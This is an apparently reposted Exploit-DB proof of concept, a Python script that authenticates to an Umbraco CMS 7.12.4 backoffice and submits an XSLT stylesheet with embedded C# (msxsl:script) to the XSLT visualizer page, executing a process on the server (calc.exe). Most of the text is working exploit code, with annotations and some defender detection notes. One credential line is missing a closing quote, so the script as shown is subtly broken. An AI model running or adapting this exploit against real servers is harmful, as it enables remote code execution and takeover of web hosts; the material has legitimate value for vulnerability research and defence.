Umbraco CMS 7.12.4 – (Authenticated) Remote Code Execution

  • 作者: Gregory Draperi
    日期: 2019-01-14
  • 来源:https://www.exploit-db.com/exploits/46153/
  • # Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
    # Dork: N/A
    # Date: 2019-01-13
    # Exploit Author: Gregory DRAPERI & Hugo BOUTINON
    # Vendor Homepage: http://www.umbraco.com/
    # Software Link: https://our.umbraco.com/download/releases
    # Version: 7.12.4
    # Category: Webapps
    # Tested on: Windows IIS
    # CVE: N/A
    
    
    import requests;
    
    from bs4 import BeautifulSoup;
    
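    def print_dict(dico):
        """Print the ``items()`` view of a mapping-like object.

        Used below on the session's cookie jar to show which cookies the
        server set on the first request. Returns None; the body was printed
        at the same column as the ``def`` in the listing, which does not
        parse, so it is indented here.
        """
        print(dico.items())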
    
    print("Start");
    
    # Execute a calc for the PoC
    # "payload" is an XSLT 1.0 stylesheet carrying an <msxsl:script> block of
    # inline C#. If the server-side transform honours script blocks, that C#
    # runs during the transform. This PoC only starts calc.exe and returns
    # its captured stdout through <xsl:value-of>; the issue demonstrated is
    # that user-supplied XSLT reaches a script-enabled transform at all.
    # Under which identity the code runs is not shown here (presumably the
    # IIS application pool — confirm on a test host).
    payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
    xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
    <msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
    { string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
     proc.StartInfo.FileName = "calc.exe"; proc.StartInfo.Arguments = cmd;\
     proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
     proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
     </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
     </xsl:template> </xsl:stylesheet> ';
    
    # Backoffice credentials and target base URL, all placeholders. Per the
    # header, the PoC requires an authenticated administrator account, so
    # exposure is bounded by who holds backoffice admin logins.
    login = "XXXX;
    password="XXXX";
    host = "XXXX";
    
    # Step 1 - Get Main page
    # One Session object carries cookies across all four requests; the
    # UMB-XSRF-TOKEN cookie read in Step 3 arrives this way.
    s = requests.session()
    url_main =host+"/umbraco/";
    r1 = s.get(url_main);
    print_dict(r1.cookies);
    
    # Step 2 - Process Login
    # JSON POST to the backoffice authentication endpoint. The response (r2)
    # is never inspected, so a failed login only surfaces as a missing form
    # field in Step 3.
    url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
    loginfo = {"username":login,"password":password};
    r2 = s.post(url_login,json=loginfo);
    
    # Step 3 - Go to vulnerable web page
    # Fetch the XSLT visualizer form and pull out the ASP.NET __VIEWSTATE /
    # __VIEWSTATEGENERATOR hidden fields plus the XSRF token cookie, which is
    # echoed back as the UMB-XSRF-TOKEN request header.
    url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
    r3 = s.get(url_xslt);
    
    soup = BeautifulSoup(r3.text, 'html.parser');
    VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
    VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
    UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
    headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
    # Form body: the stylesheet goes in ctl00$body$xsltSelection and the
    # submit button value "Visualize+XSLT" (visualizeDo) triggers the transform.
    data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};
    
    # Step 4 - Launch the attack
    # The POST below is the observable event: an authenticated POST to
    # /umbraco/developer/Xslt/xsltVisualize.aspx whose body contains an
    # <msxsl:script> element. Defender notes: alert on "msxsl:script" (and on
    # script-enabled XSLT generally) in request bodies to this path, restrict
    # Developer-section access to the minimum set of accounts, and check the
    # vendor's advisories for a fixed release. r4 is not checked; the PoC
    # reports nothing about success or failure.
    r4 = s.post(url_xslt,data=data,headers=headers);
    
    print("End");